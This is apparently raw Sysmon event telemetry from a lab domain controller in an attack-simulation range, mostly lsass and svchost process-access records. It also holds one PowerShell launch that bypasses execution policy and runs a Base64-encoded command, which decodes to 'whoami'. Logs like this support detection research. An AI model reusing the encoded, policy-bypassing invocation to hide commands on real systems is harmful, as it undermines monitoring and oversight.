12:01:27.971{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003532Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.971{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003531Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.955{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000003530Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.908{266CAFBE-6497-6064-8900-00000000AE01}4832ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000003529Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.877{266CAFBE-6497-6064-8700-00000000AE01}12202076C:\Windows\system32\conhost.exe{266CAFBE-6497-6064-8A00-00000000AE01}1564C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003528Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003527Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003526Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003525Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003524Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003523Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003522Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003521Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003520Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003519Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.877{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6497-6064-8A00-00000000AE01}1564C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003518Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.861{266CAFBE-6497-6064-8900-00000000AE01}48322188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-6497-6064-8A00-00000000AE01}1564C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+62790069(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61c134f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61c1312d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+626db42b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61bd009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61c33b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61c15b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61c15b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61c159b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61c066d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61c13c13(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61c137e0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61c134f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61c1312d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+626db42b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61bf83d8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61bf794a(wow64) 154100x80000000000000003517Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.873{266CAFBE-6497-6064-8A00-00000000AE01}1564C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6497-6064-FF70-070000000000}0x770ff0HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{266CAFBE-6497-6064-8900-00000000AE01}4832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA 10341000x80000000000000003516Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.830{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000003515Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.814{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-6497-6064-8900-00000000AE01}4832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003514Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.799{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-6497-6064-8900-00000000AE01}4832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000003513Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.799{266CAFBE-646A-6064-0B00-00000000AE01}856NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnsMD5=6E1503F4069613AB8064509A55137640,SHA256=FE42D2C661087DD60C360AFAA648FC33F5C1B0D70422F7EC5477A6CE52712C05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003512Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.799{266CAFBE-646A-6064-0B00-00000000AE01}856NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnbMD5=EB0AEBE425E3FDDDEAE26D39724C2D5C,SHA256=9A6546105A5CFDBD5CFAF22CEAF3862583583ACCF855046E0686BD5DFA98BB29,IMPHASH=00000000000000000000000000000000falsetrue 17141700x80000000000000003511Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:27.783{266CAFBE-6497-6064-8900-00000000AE01}4832\PSHost.132616656877125878.4832.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000003510Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.768{266CAFBE-6497-6064-8900-00000000AE01}4832ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ppw23kqr.r0f.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003509Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.768{266CAFBE-6497-6064-8900-00000000AE01}4832ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_yhfd0sx5.s1c.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000003508Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.752{266CAFBE-6497-6064-8900-00000000AE01}4832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_yhfd0sx5.s1c.ps12021-03-31 12:01:27.752 10341000x80000000000000003507Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.752{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 354300x80000000000000003506Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.684{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT 